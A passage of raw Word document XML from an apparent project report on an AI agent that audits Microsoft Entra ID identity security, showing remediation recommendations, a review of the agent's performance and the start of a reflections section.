              <w:rPr>
                <w:noProof/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="314B0BEC" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1FFEE0D0" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Never assign privileged roles to application identities without strict control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5300" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="100350B9" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Reassign Privileged Authentication Administrator away from the SP; use a tightly scoped, monitored service account if automation truly needs it</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C0392B"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6A3C95C8" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="0EAF74D4" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2900" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="271536A6" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Require approval/alerting on SP credential changes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5300" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="73DE56F1" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Enable monitoring for “Add service principal credentials” events, especially on SPs holding privileged roles</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="B9770E"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="33BA572F" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="47593FFF" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7C2198D1" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Periodic ownership review</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5300" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2FF085C9" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Establish a recurring review of application and service principal ownership as part of governance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="B9770E"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="39492D3D" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="3F630F7E" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2900" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="45F8F460" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Apply PIM to sensitive roles</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5300" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7AC3DF70" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Use just-in-time, time-bound activation for roles as sensitive as Privileged Authentication Administrator rather than standing assignment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="B9770E"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="475FC05A" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="56562399" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A081B8" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="berschrift1"/>
        <w:spacing w:before="400"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc243301435"/>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>7. Agent Performance Review</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="95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2400"/>
        <w:gridCol w:w="7100"/>
      </w:tblGrid>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="5535DCA1"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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="459D4137" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Area</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1E3A5F"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3CDBBEDC" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Observation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="60E42796" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0E5DFD1C" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Where the agent helped</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7100" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="46C3CEDF" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Correctly executed and explained all five Stage 3 audit checks in a consistent Finding/Risk/Fix/Severity format; chained multiple tool calls per question without manual intervention; correctly reported negative results rather than fabricating risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="79F75453" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2BCF98E2" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Where it needed support</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5628E573" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Initial tool-call failures (missing parameters, empty responses from long tool chains) required debugging the agent harness; a flawed Graph query (/directoryRoles/{id}/members) caused one false negative, corrected by switching to the unified RBAC endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="5EF741A9" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="206AF568" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Where it got things wrong</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7100" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="425556FF" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Returned an empty reply on a nine-tool-call turn without enough token budget (resolved by raising max_completion_tokens); once used a single-SP-scoped tool for a role-wide membership question, producing an invalid call</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="18E58150" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4E9EE61B" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Manual vs. agent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="40EE815C" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>The ownership chain was found through manual portal enumeration first, matching the project brief's recommended approach; the agent was then extended with matching tools and correctly reproduced and explained the same findings</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="379E9A34" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8E82F3" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="berschrift1"/>
        <w:spacing w:before="400"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc243301436"/>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>8. Reflections</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="284277C0" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Building an AI agent for identity security surfaced several consistent lessons.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F8C191" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>First, the agent is only as good as the tools it is given. Microsoft Graph's API surface for ownership, role assignment and permission grants is spread across several distinct endpoints (ownedObjects, appRoleAssignments, roleManagement/directory/roleAssignments), and a tool that queries the wrong one produces a confident, well-formatted, but wrong negative result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A268FBA" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Second, enforcing a strict “answer only from tool results” system prompt was effective at preventing hallucinated findings. It also meant that gaps in tool coverage became visible as honest “I don't have a tool for that” responses rather than being silently papered over — a desirable failure mode for a security tool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546480F3" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Third, solving Scenario 1 manually before automating it was essential. The manual walkthrough revealed exactly which Graph relationship mattered (ownership of a service principal holding a privileged directory role), making it possible to write a correct, narrowly scoped tool rather than guessing at a broad one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB3D4D4" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
